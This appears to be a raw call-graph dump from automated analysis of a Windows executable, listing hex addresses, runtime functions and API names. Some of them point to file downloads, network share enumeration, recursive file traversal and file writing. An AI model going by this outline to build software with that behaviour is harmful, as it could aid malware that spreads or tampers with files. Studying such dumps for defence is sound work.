42923->42924 42925 42df44 42924->42925 42926 42df2d 42924->42926 42928 42dfe3 42925->42928 42930 42df58 42925->42930 43023 4251d4 58 API calls __getptd_noexit 42926->43023 43027 4251d4 58 API calls __getptd_noexit 42928->43027 42929 42df32 42933 425208 _vscan_fn 58 API calls 42929->42933 42934 42df80 42930->42934 42935 42df76 42930->42935 42932 42df7b 42939 425208 _vscan_fn 58 API calls 42932->42939 42937 42df39 __ioinit 42933->42937 42951 43b134 42934->42951 43024 4251d4 58 API calls __getptd_noexit 42935->43024 42937->42922 42941 42dfef 42939->42941 42940 42df86 42942 42df99 42940->42942 42943 42dfac 42940->42943 43028 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42941->43028 42960 42e003 42942->42960 42946 425208 _vscan_fn 58 API calls 42943->42946 42947 42dfb1 42946->42947 43025 4251d4 58 API calls __getptd_noexit 42947->43025 42949 42dfa5 43026 42dfdb LeaveCriticalSection __unlock_fhandle 42949->43026 42953 43b140 __ioinit 42951->42953 42952 43b18f EnterCriticalSection 42954 43b1b5 __ioinit 42952->42954 42953->42952 42955 428af7 __lock 58 API calls 42953->42955 42954->42940 42956 43b165 42955->42956 42957 43b17d 42956->42957 43029 43263e InitializeCriticalSectionAndSpinCount 42956->43029 43030 43b1b9 LeaveCriticalSection _doexit 42957->43030 42961 42e010 __ftell_nolock 42960->42961 42962 42e06e 42961->42962 42963 42e04f 42961->42963 42996 42e044 42961->42996 42968 42e0c6 42962->42968 42969 42e0aa 42962->42969 43031 4251d4 58 API calls __getptd_noexit 42963->43031 42964 42a77e _ValidateLocalCookies 6 API calls 42966 42e864 42964->42966 42966->42949 42967 42e054 42971 425208 _vscan_fn 58 API calls 42967->42971 42972 42e0df 42968->42972 43035 42f744 60 API calls 3 library calls 42968->43035 43033 4251d4 58 API calls __getptd_noexit 42969->43033 42974 42e05b 42971->42974 42976 4389c2 __stbuf 58 API calls 42972->42976 42973 42e0af 42977 425208 _vscan_fn 58 API calls 42973->42977 43032 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42974->43032 42979 42e0ed 42976->42979 42980 42e0b6 42977->42980 42981 42e446 42979->42981 42985 425007 FindHandlerForForeignException 58 API calls 42979->42985 43034 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 42980->43034 42982 42e464 42981->42982 42983 42e7d9 WriteFile 42981->42983 42986 42e588 42982->42986 42994 42e47a 42982->42994 42987 42e439 GetLastError 42983->42987 43011 42e678 42983->43011 42988 42e119 GetConsoleMode 42985->42988 42990 42e593 42986->42990 42991 42e67d 42986->42991 42998 42e406 42987->42998 42988->42981 42992 42e158 42988->42992 42989 42e812 42989->42996 42997 425208 _vscan_fn 58 API calls 42989->42997 42990->42989 43004 42e5f8 WriteFile 42990->43004 42991->42989 43003 42e6f2 WideCharToMultiByte 42991->43003 42992->42981 42993 42e168 GetConsoleCP 42992->42993 42993->42989 43020 42e197 42993->43020 42994->42989 42995 42e4e9 WriteFile 42994->42995 42994->42998 42995->42987 42995->42994 42996->42964 42999 42e840 42997->42999 42998->42989 42998->42996 43000 42e566 42998->43000 43039 4251d4 58 API calls __getptd_noexit 42999->43039 43001 42e571 43000->43001 43002 42e809 43000->43002 43006 425208 _vscan_fn 58 API calls 43001->43006 43038 4251e7 58 API calls 3 library calls 43002->43038 43003->42987 43016 42e739 43003->43016 43004->42987 43008 42e647 43004->43008 43009 42e576 43006->43009 43008->42990 43008->42998 43008->43011 43037 4251d4 58 API calls __getptd_noexit 43009->43037 43010 42e741 WriteFile 43014 42e794 GetLastError 43010->43014 43010->43016 43011->42998 43014->43016 43015 43c76c 60 API calls __putch_nolock 43015->43020 43016->42991 43016->42998 43016->43010 43016->43011 43017 44058c WriteConsoleW CreateFileW __putwch_nolock 43021 42e2ed 43017->43021 43018 42e280 WideCharToMultiByte 43018->42998 43019 42e2bb WriteFile 43018->43019 43019->42987 43019->43021 43020->42998 43020->43015 43020->43018 43020->43021 43036 422d33 58 API calls __isleadbyte_l 43020->43036 43021->42987 43021->42998 43021->43017 43021->43020 43022 42e315 WriteFile 43021->43022 43022->42987 43022->43021 43023->42929 43024->42932 43025->42949 43026->42937 43027->42932 43028->42937 43029->42957 43030->42952 43031->42967 43032->42996 43033->42973 43034->42996 43035->42972 43036->43020 43037->42996 43038->42996 43039->42996 43040->42775 43041->42778 43042->42780 43043->42785 43044->42794 43046 413c62 43045->43046 43052 413c74 _memset 43045->43052 43047 413c67 43046->43047 43048 413c96 43046->43048 43049 423b4c 59 API calls 43047->43049 43062 44f23e 59 API calls 2 library calls 43048->43062 43051 413c6d 43049->43051 43051->43052 43063 44f1bb 59 API calls 3 library calls 43051->43063 43052->42465 43056 418513 43055->43056 43061 418520 43055->43061 43056->43061 43064 415810 59 API calls _signal 43056->43064 43058 418619 43058->42467 43059 44f23e 59 API calls 43059->43061 43061->43058 43061->43059 43065 416760 59 API calls 2 library calls 43061->43065 43064->43061 43065->43061 43066->42469 43067->42473 43068->42475 43069->42480 43070->42482 43071->42502 43072->42502 43073->42527 43074->42527 43075->42534 43076->42534 43077->42541 43117 421037 43078->43117 43080 40c78a 43080->42553 43081 420546 43080->43081 43082 420550 43081->43082 43083 420564 43081->43083 43084 425208 _vscan_fn 58 API calls 43082->43084 43083->42570 43085 420555 43084->43085 43318 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43085->43318 43087 420560 43087->42570 43089 42110d __ioinit 43088->43089 43090 42111e 43089->43090 43092 42114c 43089->43092 43091 425208 _vscan_fn 58 API calls 43090->43091 43093 421123 43091->43093 43097 42112e __ioinit 43092->43097 43319 420e53 43092->43319 43364 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43093->43364 43096 42117d 43365 4211b5 LeaveCriticalSection LeaveCriticalSection _ungetc 43096->43365 43097->42570 43100 42115b 43100->43096 43325 429312 43100->43325 43102 423a44 __ioinit 43101->43102 43103 423a70 43102->43103 43104 423a58 43102->43104 43106 420e53 __lock_file 59 API calls 43103->43106 43110 423a68 __ioinit 43103->43110 43105 425208 _vscan_fn 58 API calls 43104->43105 43107 423a5d 43105->43107 43108 423a82 43106->43108 43530 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43107->43530 43514 4239cc 43108->43514 43110->42553 43114->42558 43115->42560 43116->42565 43120 421043 __ioinit 43117->43120 43118 421056 43119 425208 _vscan_fn 58 API calls 43118->43119 43122 42105b 43119->43122 43120->43118 43121 421087 43120->43121 43136 428df4 43121->43136 43166 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43122->43166 43125 42108c 43126 4210a2 43125->43126 43127 421095 43125->43127 43129 4210cc 43126->43129 43130 4210ac 43126->43130 43128 425208 _vscan_fn 58 API calls 43127->43128 43135 421066 __ioinit @_EH4_CallFilterFunc@8 43128->43135 43151 428f13 43129->43151 43131 425208 _vscan_fn 58 API calls 43130->43131 43131->43135 43135->43080 43137 428e00 __ioinit 43136->43137 43138 428af7 __lock 58 API calls 43137->43138 43149 428e0e 43138->43149 43139 428e82 43168 428f0a 43139->43168 43140 428e89 43172 428cde 58 API calls 2 library calls 43140->43172 43143 428e90 43143->43139 43173 43263e InitializeCriticalSectionAndSpinCount 43143->43173 43144 428eff __ioinit 43144->43125 43146 428b9f __mtinitlocknum 58 API calls 43146->43149 43147 420e92 __getstream 59 API calls 43147->43149 43148 428eb6 EnterCriticalSection 43148->43139 43149->43139 43149->43140 43149->43146 43149->43147 43171 420efc LeaveCriticalSection LeaveCriticalSection _doexit 43149->43171 43160 428f33 _TestDefaultCountry 43151->43160 43152 428f4d 43153 425208 _vscan_fn 58 API calls 43152->43153 43155 428f52 43153->43155 43154 429108 43154->43152 43158 42916b 43154->43158 43178 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43155->43178 43157 4210d7 43167 4210f9 LeaveCriticalSection LeaveCriticalSection _ungetc 43157->43167 43175 43c214 43158->43175 43160->43152 43160->43154 43179 43c232 60 API calls 2 library calls 43160->43179 43162 429101 43162->43154 43180 43c232 60 API calls 2 library calls 43162->43180 43164 429120 43164->43154 43181 43c232 60 API calls 2 library calls 43164->43181 43166->43135 43167->43135 43174 428c81 LeaveCriticalSection 43168->43174 43170 428f11 43170->43144 43171->43149 43172->43143 43173->43148 43174->43170 43182 43b9f8 43175->43182 43177 43c22d 43177->43157 43178->43157 43179->43162 43180->43164 43181->43154 43184 43ba04 __ioinit 43182->43184 43183 43ba1a 43185 425208 _vscan_fn 58 API calls 43183->43185 43184->43183 43186 43ba50 43184->43186 43187 43ba1f 43185->43187 43193 43bac1 43186->43193 43265 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43187->43265 43192 43ba29 __ioinit 43192->43177 43194 43bae1 43193->43194 43267 447f50 43194->43267 43196 43bc34 43313 4242fd 8 API calls 2 library calls 43196->43313 43198 43bafd 43198->43196 43200 43bb37 43198->43200 43205 43bb5a 43198->43205 43199 43c213 43298 4251d4 58 API calls __getptd_noexit 43200->43298 43202 43bb3c 43203 425208 _vscan_fn 58 API calls 43202->43203 43204 43bb49 43203->43204 43299 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43204->43299 43206 43bc18 43205->43206 43214 43bbf6 43205->43214 43300 4251d4 58 API calls __getptd_noexit 43206->43300 43209 43ba6c 43266 43ba95 LeaveCriticalSection __unlock_fhandle 43209->43266 43210 43bc1d 43211 425208 _vscan_fn 58 API calls 43210->43211 43212 43bc2a 43211->43212 43301 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43212->43301 43274 43b1c2 43214->43274 43216 43bcc4 43217 43bcf1 43216->43217 43218 43bcce 43216->43218 43292 43b88d 43217->43292 43302 4251d4 58 API calls __getptd_noexit 43218->43302 43221 43bcd3 43222 425208 _vscan_fn 58 API calls 43221->43222 43224 43bcdd 43222->43224 43223 43bd91 GetFileType 43225 43bdde 43223->43225 43226 43bd9c GetLastError 43223->43226 43230 425208 _vscan_fn 58 API calls 43224->43230 43305 43b56e 59 API calls 2 library calls 43225->43305 43304 4251e7 58 API calls 3 library calls 43226->43304 43227 43bd5f GetLastError 43303 4251e7 58 API calls 3 library calls 43227->43303 43230->43209 43232 43b88d ___createFile 3 API calls 43235 43bd54 43232->43235 43233 43bd84 43238 425208 _vscan_fn 58 API calls 43233->43238 43234 43bdc3 CloseHandle 43234->43233 43237 43bdd1 43234->43237 43235->43223 43235->43227 43239 425208 _vscan_fn 58 API calls 43237->43239 43238->43196 43240 43bdd6 43239->43240 43240->43233 43241 43bdfc 43242 43bfb7 43241->43242 43262 43be7d 43241->43262 43306 42f744 60 API calls 3 library calls 43241->43306 43242->43196 43244 43c18a CloseHandle 43242->43244 43246 43b88d ___createFile 3 API calls 43244->43246 43245 43be66 43245->43262 43307 4251d4 58 API calls __getptd_noexit 43245->43307 43248 43c1b1 43246->43248 43247 42b5c4 70 API calls __read_nolock 43247->43262 43250 43c1b9 GetLastError 43248->43250 43257 43c041 43248->43257 43311 4251e7 58 API calls 3 library calls 43250->43311 43252 43be85 43252->43262 43308 430b25 61 API calls 3 library calls 43252->43308 43309 447cac 82 API calls 5 library calls 43252->43309 43254 43c1c5 43312 43b36b 59 API calls 2 library calls 43254->43312 43257->43196 43258 42df14 __write 78 API calls 43258->43262 43259 43c034 43310 430b25 61 API calls 3 library calls 43259->43310 43261 43c03b 43263 425208 _vscan_fn 58 API calls 43261->43263 43262->43242 43262->43247 43262->43252 43262->43258 43262->43259 43264 42f744 60 API calls __lseeki64_nolock 43262->43264 43263->43257 43264->43262 43265->43192 43266->43192 43268 447f6f 43267->43268 43269 447f5a 43267->43269 43268->43198 43270 425208 _vscan_fn 58 API calls 43269->43270 43271 447f5f 43270->43271 43314 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43271->43314 43273 447f6a 43273->43198 43275 43b1ce __ioinit 43274->43275 43276 428b9f __mtinitlocknum 58 API calls 43275->43276 43277 43b1df 43276->43277 43278 428af7 __lock 58 API calls 43277->43278 43279 43b1e4 __ioinit 43277->43279 43288 43b1f2 43278->43288 43279->43216 43280 43b340 43317 43b362 LeaveCriticalSection _doexit 43280->43317 43282 43b2d2 43283 428c96 __calloc_crt 58 API calls 43282->43283 43286 43b2db 43283->43286 43284 428af7 __lock 58 API calls 43284->43288 43285 43b272 EnterCriticalSection 43287 43b282 LeaveCriticalSection 43285->43287 43285->43288 43286->43280 43289 43b134 ___lock_fhandle 59 API calls 43286->43289 43287->43288 43288->43280 43288->43282 43288->43284 43288->43285 43315 43263e InitializeCriticalSectionAndSpinCount 43288->43315 43316 43b29a LeaveCriticalSection _doexit 43288->43316 43289->43280 43293 43b898 ___crtIsPackagedApp 43292->43293 43294 43b8f3 CreateFileW 43293->43294 43295 43b89c GetModuleHandleW GetProcAddress 43293->43295 43297 43b911 43294->43297 43296 43b8b9 43295->43296 43296->43297 43297->43223 43297->43227 43297->43232 43298->43202 43299->43209 43300->43210 43301->43196 43302->43221 43303->43233 43304->43234 43305->43241 43306->43245 43307->43262 43308->43252 43309->43252 43310->43261 43311->43254 43312->43257 43313->43199 43314->43273 43315->43288 43316->43288 43317->43279 43318->43087 43320 420e63 43319->43320 43321 420e85 EnterCriticalSection 43319->43321 43320->43321 43323 420e6b 43320->43323 43322 420e7b 43321->43322 43322->43100 43324 428af7 __lock 58 API calls 43323->43324 43324->43322 43326 4294a3 43325->43326 43327 42932b 43325->43327 43363 42938a 43326->43363 43389 43c784 72 API calls 4 library calls 43326->43389 43328 42816b __filbuf 58 API calls 43327->43328 43330 429331 43328->43330 43331 42816b __filbuf 58 API calls 43330->43331 43345 429354 43330->43345 43332 42933d 43331->43332 43335 42816b __filbuf 58 API calls 43332->43335 43332->43345 43333 4293c0 43333->43326 43336 42816b __filbuf 58 API calls 43333->43336 43334 42936d 43337 42b2f2 __filbuf 72 API calls 43334->43337 43338 429372 43334->43338 43339 429349 43335->43339 43340 4293d0 43336->43340 43337->43338 43343 42b2f2 __filbuf 72 API calls 43338->43343 43338->43363 43341 42816b __filbuf 58 API calls 43339->43341 43342 4293f3 43340->43342 43346 42816b __filbuf 58 API calls 43340->43346 43341->43345 43342->43326 43344 42940e 43342->43344 43343->43363 43347 429416 43344->43347 43366 42b2f2 43344->43366 43345->43333 43345->43334 43348 4293dc 43346->43348 43347->43363 43386 422d33 58 API calls __isleadbyte_l 43347->43386 43348->43342 43350 42816b __filbuf 58 API calls 43348->43350 43351 4293e8 43350->43351 43353 42816b __filbuf 58 API calls 43351->43353 43353->43342 43354 42943e 43355 429473 43354->43355 43356 429448 43354->43356 43358 42b2f2 __filbuf 72 API calls 43354->43358 43388 43c76c 60 API calls __input_s_l 43355->43388 43356->43355 43360 429460 43356->43360 43358->43356 43359 429487 43362 425208 _vscan_fn 58 API calls 43359->43362 43359->43363 43387 43c607 60 API calls 5 library calls 43360->43387 43362->43363 43363->43100 43364->43097 43365->43097 43367 42b2fd 43366->43367 43371 42b312 43366->43371 43368 425208 _vscan_fn 58 API calls 43367->43368 43369 42b302 43368->43369 43423 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43369->43423 43372 42b347 43371->43372 43379 42b30d 43371->43379 43424 438a16 58 API calls __malloc_crt 43371->43424 43374 42816b __filbuf 58 API calls 43372->43374 43375 42b35b 43374->43375 43390 42b4b0 43375->43390 43377 42b362 43378 42816b __filbuf 58 API calls 43377->43378 43377->43379 43380 42b385 43378->43380 43379->43347 43380->43379 43381 42816b __filbuf 58 API calls 43380->43381 43382 42b391 43381->43382 43382->43379 43383 42816b __filbuf 58 API calls 43382->43383 43384 42b39e 43383->43384 43385 42816b __filbuf 58 API calls 43384->43385 43385->43379 43386->43354 43387->43363 43388->43359 43389->43363 43391 42b4bc __ioinit 43390->43391 43392 42b4e0 43391->43392 43393 42b4c9 43391->43393 43395 42b5a4 43392->43395 43398 42b4f4 43392->43398 43493 4251d4 58 API calls __getptd_noexit 43393->43493 43498 4251d4 58 API calls __getptd_noexit 43395->43498 43397 42b4ce 43400 425208 _vscan_fn 58 API calls 43397->43400 43401 42b512 43398->43401 43402 42b51f 43398->43402 43399 42b517 43407 425208 _vscan_fn 58 API calls 43399->43407 43414 42b4d5 __ioinit 43400->43414 43494 4251d4 58 API calls __getptd_noexit 43401->43494 43404 42b541 43402->43404 43405 42b52c 43402->43405 43406 43b134 ___lock_fhandle 59 API calls 43404->43406 43495 4251d4 58 API calls __getptd_noexit 43405->43495 43409 42b547 43406->43409 43410 42b539 43407->43410 43412 42b55a 43409->43412 43413 42b56d 43409->43413 43499 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43410->43499 43411 42b531 43415 425208 _vscan_fn 58 API calls 43411->43415 43425 42b5c4 43412->43425 43418 425208 _vscan_fn 58 API calls 43413->43418 43414->43377 43415->43410 43420 42b572 43418->43420 43419 42b566 43497 42b59c LeaveCriticalSection __unlock_fhandle 43419->43497 43496 4251d4 58 API calls __getptd_noexit 43420->43496 43423->43379 43424->43372 43426 42b5e5 43425->43426 43427 42b5fc 43425->43427 43500 4251d4 58 API calls __getptd_noexit 43426->43500 43429 42bd34 43427->43429 43434 42b636 43427->43434 43512 4251d4 58 API calls __getptd_noexit 43429->43512 43431 42b5ea 43433 425208 _vscan_fn 58 API calls 43431->43433 43432 42bd39 43435 425208 _vscan_fn 58 API calls 43432->43435 43473 42b5f1 43433->43473 43436 42b63e 43434->43436 43441 42b655 43434->43441 43438 42b64a 43435->43438 43501 4251d4 58 API calls __getptd_noexit 43436->43501 43513 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43438->43513 43439 42b643 43443 425208 _vscan_fn 58 API calls 43439->43443 43442 42b66a 43441->43442 43445 42b684 43441->43445 43446 42b6a2 43441->43446 43441->43473 43502 4251d4 58 API calls __getptd_noexit 43442->43502 43443->43438 43445->43442 43448 42b68f 43445->43448 43503 428cde 58 API calls 2 library calls 43446->43503 43450 4389c2 __stbuf 58 API calls 43448->43450 43449 42b6b2 43451 42b6d5 43449->43451 43452 42b6ba 43449->43452 43453 42b7a3 43450->43453 43505 42f744 60 API calls 3 library calls 43451->43505 43454 425208 _vscan_fn 58 API calls 43452->43454 43455 42b81c ReadFile 43453->43455 43460 42b7b9 GetConsoleMode 43453->43460 43457 42b6bf 43454->43457 43458 42b83e 43455->43458 43459 42bcfc GetLastError 43455->43459 43504 4251d4 58 API calls __getptd_noexit 43457->43504 43458->43459 43466 42b80e 43458->43466 43462 42b7fc 43459->43462 43463 42bd09 43459->43463 43464 42b819 43460->43464 43465 42b7cd 43460->43465 43474 42b802 43462->43474 43506 4251e7 58 API calls 3 library calls 43462->43506 43467 425208 _vscan_fn 58 API calls 43463->43467 43464->43455 43465->43464 43468 42b7d3 ReadConsoleW 43465->43468 43466->43474 43476 42bae0 43466->43476 43478 42b873 43466->43478 43470 42bd0e 43467->43470 43468->43466 43471 42b7f6 GetLastError 43468->43471 43511 4251d4 58 API calls __getptd_noexit 43470->43511 43471->43462 43473->43419 43474->43473 43509 420bed 58 API calls 2 library calls 43474->43509 43476->43474 43481 42bbe6 ReadFile 43476->43481 43477 42b960 43477->43474 43483 42ba1d 43477->43483 43484 42ba0d 43477->43484 43487 42b9cd MultiByteToWideChar 43477->43487 43478->43477 43480 42b8df ReadFile 43478->43480 43482 42b900 GetLastError 43480->43482 43489 42b90a 43480->43489 43485 42bc09 GetLastError 43481->43485 43492 42bc17 43481->43492 43482->43489 43483->43487 43508 42f744 60 API calls 3 library calls 43483->43508 43486 425208 _vscan_fn 58 API calls 43484->43486 43485->43492 43486->43474 43487->43471 43487->43474 43489->43478 43507 42f744 60 API calls 3 library calls 43489->43507 43492->43476 43510 42f744 60 API calls 3 library calls 43492->43510 43493->43397 43494->43399 43495->43411 43496->43419 43497->43414 43498->43399 43499->43414 43500->43431 43501->43439 43502->43439 43503->43449 43504->43473 43505->43448 43506->43474 43507->43489 43508->43487 43509->43473 43510->43492 43511->43474 43512->43432 43513->43473 43515 4239db 43514->43515 43516 4239ef 43514->43516 43517 425208 _vscan_fn 58 API calls 43515->43517 43518 42836b __flush 78 API calls 43516->43518 43528 4239eb 43516->43528 43519 4239e0 43517->43519 43521 4239fb 43518->43521 43532 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 43519->43532 43533 430bbf 58 API calls _free 43521->43533 43523 423a03 43524 42816b __filbuf 58 API calls 43523->43524 43525 423a09 43524->43525 43534 430a4a 63 API calls 6 library calls 43525->43534 43527 423a0f 43527->43528 43535 420bed 58 API calls 2 library calls 43527->43535 43531 423aa7 LeaveCriticalSection LeaveCriticalSection _ungetc 43528->43531 43530->43110 43531->43110 43532->43528 43533->43523 43534->43527 43535->43528 43538 415ab8 43537->43538 43539 4159e8 43537->43539 43615 44f26c 59 API calls 3 library calls 43538->43615 43541 415ac2 43539->43541 43542 415a02 43539->43542 43616 44f23e 59 API calls 2 library calls 43541->43616 43544 415acc 43542->43544 43545 415a1a 43542->43545 43548 415a2a _signal 43542->43548 43617 44f23e 59 API calls 2 library calls 43544->43617 43547 416950 59 API calls 43545->43547 43545->43548 43547->43548 43548->42629 43615->43541 43748 423f74 43705->43748 43708 41f196 Sleep 43709 41f1c1 43708->43709 43710 41f94b 43708->43710 43712 410a50 65 API calls 43709->43712 43711 414690 59 API calls 43710->43711 43713 41f97a 43711->43713 43722 41f1cd 43712->43722 43808 410160 89 API calls 5 library calls 43713->43808 43715 41f216 43716 415c10 59 API calls 43715->43716 43717 41f274 43716->43717 43751 40f730 43717->43751 43718 41f9c1 SendMessageW 43721 41f9e1 43718->43721 43744 41f8af 43718->43744 43720 420235 _TranslateName 60 API calls 43720->43722 43721->43744 43722->43715 43722->43720 43723 4111c0 170 API calls 43724 41f987 43723->43724 43724->43718 43724->43723 43725 411ab0 PeekMessageW DispatchMessageW PeekMessageW 43724->43725 43725->43724 43726 415c10 59 API calls 43729 41f281 43726->43729 43727 415c10 59 API calls 43730 41f392 43727->43730 43728 41f5bd PeekMessageW 43736 41f52c 43728->43736 43729->43726 43729->43730 43735 40f730 192 API calls 43729->43735 43730->43727 43731 40f730 192 API calls 43730->43731 43730->43736 43731->43730 43732 414690 59 API calls 43732->43736 43733 41f689 43734 415c10 59 API calls 43733->43734 43737 41f73e 43734->43737 43735->43729 43736->43728 43736->43732 43736->43733 43738 41f5d6 DispatchMessageW PeekMessageW 43736->43738 43740 40f730 192 API calls 43736->43740 43739 40f730 192 API calls 43737->43739 43738->43736 43746 41f74b 43739->43746 43740->43736 43741 41f893 SendMessageW 43741->43744 43742 41f7cf PeekMessageW 43742->43746 43743 414690 59 API calls 43743->43746 43745 41f7e7 DispatchMessageW PeekMessageW 43745->43746 43746->43741 43746->43742 43746->43743 43746->43745 43747 40f730 192 API calls 43746->43747 43747->43746 43749 425007 FindHandlerForForeignException 58 API calls 43748->43749 43750 41f16a Sleep 43749->43750 43750->43708 43750->43744 43752 411ab0 3 API calls 43751->43752 43761 40f765 43752->43761 43753 40f8b5 43754 414690 59 API calls 43753->43754 43755 40f8ea PathFindFileNameW 43754->43755 43757 40f923 43755->43757 43756 414690 59 API calls 43756->43761 43757->43757 43758 415c10 59 API calls 43757->43758 43759 40f98c 43758->43759 43760 413520 59 API calls 43759->43760 43779 40f9a8 _memmove 43760->43779 43761->43753 43761->43756 43762 415ae0 59 API calls 43761->43762 43763 420235 _TranslateName 60 API calls 43761->43763 43778 40f927 43761->43778 43762->43761 43763->43761 43764 40fa44 PathFindFileNameW 43764->43779 43765 40fb28 43766 40fcdc 43765->43766 43769 414690 59 API calls 43765->43769 43849 417140 43766->43849 43767 415c10 59 API calls 43767->43779 43771 40fb55 43769->43771 43809 40f310 LoadLibraryW 43771->43809 43772 413520 59 API calls 43772->43779 43775 40fb5a 43775->43766 43776 414690 59 API calls 43775->43776 43777 40fb75 43776->43777 43780 413a90 59 API calls 43777->43780 43778->43729 43779->43764 43779->43765 43779->43767 43779->43772 43781 40fb86 PathAppendW 43780->43781 43785 418400 59 API calls 43781->43785 43782 410052 FindNextFileW 43784 41006b FindClose 43782->43784 43806 40fd22 _wcsstr 43782->43806 43784->43778 43787 40fbfe _memmove 43785->43787 43786 40fc4f PathFileExistsW 43786->43766 43789 40fc6d 43786->43789 43787->43786 43788 417140 59 API calls 43788->43806 43792 420c62 _malloc 58 API calls 43789->43792 43790 411ab0 3 API calls 43790->43806 43791 415ae0 59 API calls 43791->43806 43794 40fc77 lstrcpyW 43792->43794 43793 414690 59 API calls 43793->43806 43796 40fca1 43794->43796 43797 40fca3 lstrcatW 43794->43797 43796->43797 43799 414690 59 API calls 43797->43799 43801 40fccf 43799->43801 43842 40f0e0 CreateFileW 43801->43842 43802 40ff41 PathFindExtensionW 43802->43806 43804 40fcd6 43872 420bed 58 API calls 2 library calls 43804->43872 43806->43778 43806->43782 43806->43788 43806->43790 43806->43791 43806->43793 43807 4111c0 170 API calls 43806->43807 43857 415ae0 43806->43857 43873 413b70 59 API calls 43806->43873 43807->43806 43808->43724 43810 40f34b GetProcAddress 43809->43810 43813 40f344 43809->43813 43811 413a90 59 API calls 43810->43811 43812 40f368 43811->43812 43814 418400 59 API calls 43812->43814 43813->43775 43815 40f39d 43814->43815 43816 415c10 59 API calls 43815->43816 43817 40f3c4 43816->43817 43818 415c10 59 API calls 43817->43818 43819 40f3eb 43818->43819 43874 40f2b0 59 API calls 43819->43874 43821 415c10 59 API calls 43823 40f45e 43821->43823 43822 40f3fe 43822->43821 43824 415c10 59 API calls 43823->43824 43825 40f485 43824->43825 43875 40f2b0 59 API calls 43825->43875 43827 40f498 43828 40f50a 43827->43828 43876 418380 65 API calls __forcdecpt_l 43827->43876 43830 40f542 43828->43830 43877 418380 65 API calls __forcdecpt_l 43828->43877 43832 40f560 FreeLibrary 43830->43832 43833 40f56e 43830->43833 43835 40f6c7 43832->43835 43834 413520 59 API calls 43833->43834 43836 40f57d 43834->43836 43835->43813 43838 413520 59 API calls 43836->43838 43840 40f5ed 43836->43840 43837 40f6a5 FreeLibrary 43837->43835 43838->43840 43839 413520 59 API calls 43841 40f65d 43839->43841 43840->43837 43840->43839 43841->43837 43843 40f136 43842->43843 43848 40f1b4 43842->43848 43844 415c10 59 API calls 43843->43844 43845 40f178 43844->43845 43846 412840 60 API calls 43845->43846 43847 40f183 lstrlenA WriteFile CloseHandle 43846->43847 43847->43848 43848->43804 43850 417197 43849->43850 43851 4171c8 43850->43851 43878 415d50 59 API calls _signal 43850->43878 43852 4159d0 59 API calls 43851->43852 43854 4171ef 43852->43854 43855 415ae0 59 API calls 43854->43855 43856 40fd00 FindFirstFileW 43855->43856 43856->43806 43858 415b36 43857->43858 43865 415aee 43857->43865 43859 415bf1 43858->43859 43861 415b49 43858->43861 43879 44f23e 59 API calls 2 library calls 43859->43879 43862 415bfb 43861->43862 43863 415b61 43861->43863 43869 415b71 _signal 43861->43869 43880 44f23e 59 API calls 2 library calls 43862->43880 43867 416950 59 API calls 43863->43867 43863->43869 43865->43858 43868 415b15 43865->43868 43867->43869 43870 4159d0 59 API calls 43868->43870 43869->43802 43871 415b30 43870->43871 43871->43802 43872->43766 43873->43806 43874->43822 43875->43827 43876->43828 43877->43830 43878->43851 43884 410bd0 WNetOpenEnumW 43881->43884 43883 41fd95 SendMessageW 43885 410c33 GlobalAlloc 43884->43885 43886 410c1c 43884->43886 43889 410c45 _memset 43885->43889 43886->43883 43887 410c51 WNetEnumResourceW 43888 410ea3 WNetCloseEnum 43887->43888 43887->43889 43888->43883 43889->43887 43889->43889 43890 415c10 59 API calls 43889->43890 43891 418fd0 59 API calls 43889->43891 43892 4150c0 59 API calls 43889->43892 43893 410bd0 59 API calls 43889->43893 43890->43889 43891->43889 43892->43889 43893->43889 43895 42f7c0 __ftell_nolock 43894->43895 43896 41e6b6 timeGetTime 43895->43896 43897 423f74 58 API calls 43896->43897 43898 41e6cc 43897->43898 43966 40c6a0 RegOpenKeyExW 43898->43966 43901 41e72e InternetOpenW 43949 41e6d4 _memset _strstr _wcsstr 43901->43949 43902 41ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 43902->43949 43903 41ea4c SHGetFolderPathA 43904 41ea67 PathAppendA DeleteFileA 43903->43904 43903->43949 43904->43949 43906 41eada lstrlenA 43906->43949 43907 4156d0 59 API calls 43907->43949 43908 414690 59 API calls 43921 41e7be _memmove 43908->43921 43909 41ee4d 43911 40ef50 58 API calls 43909->43911 43910 415ae0 59 API calls 43910->43949 43916 41ee5d 43911->43916 43912 413ff0 59 API calls 43912->43949 43913 412900 60 API calls 43913->43949 43915 41eb53 lstrcpyW 43917 41eb74 lstrlenA 43915->43917 43915->43949 43919 413ea0 59 API calls 43916->43919 43923 41eeb1 43916->43923 43920 420c62 _malloc 58 API calls 43917->43920 43918 4159d0 59 API calls 43918->43949 43919->43916 43920->43949 43921->43908 43921->43909 43921->43949 44007 40dd40 73 API calls 4 library calls 43921->44007 44009 420bed 58 API calls 2 library calls 43921->44009 44010 411b10 7 API calls 43921->44010 43922 41e8f3 lstrcpyW 43924 41e943 InternetOpenUrlW InternetReadFile 43922->43924 43922->43949 43925 40ef50 58 API calls 43923->43925 43927 41e9ec InternetCloseHandle InternetCloseHandle 43924->43927 43928 41e97c SHGetFolderPathA 43924->43928 43933 41eec1 43925->43933 43926 41eb99 MultiByteToWideChar lstrcpyW 43926->43949 43927->43949 43928->43927 43929 41e996 PathAppendA 43928->43929 43991 4220b6 43929->43991 43930 41ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 43930->43949 43932 41e93c lstrcatW 43932->43924 43933->43933 43936 413ea0 59 API calls 43933->43936 43940 41ef12 43933->43940 43934 41ebf0 SHGetFolderPathA 43935 41ec17 PathAppendA DeleteFileA 43934->43935 43934->43949 43935->43949 43936->43933 43937 41e9c4 lstrlenA 43994 422b02 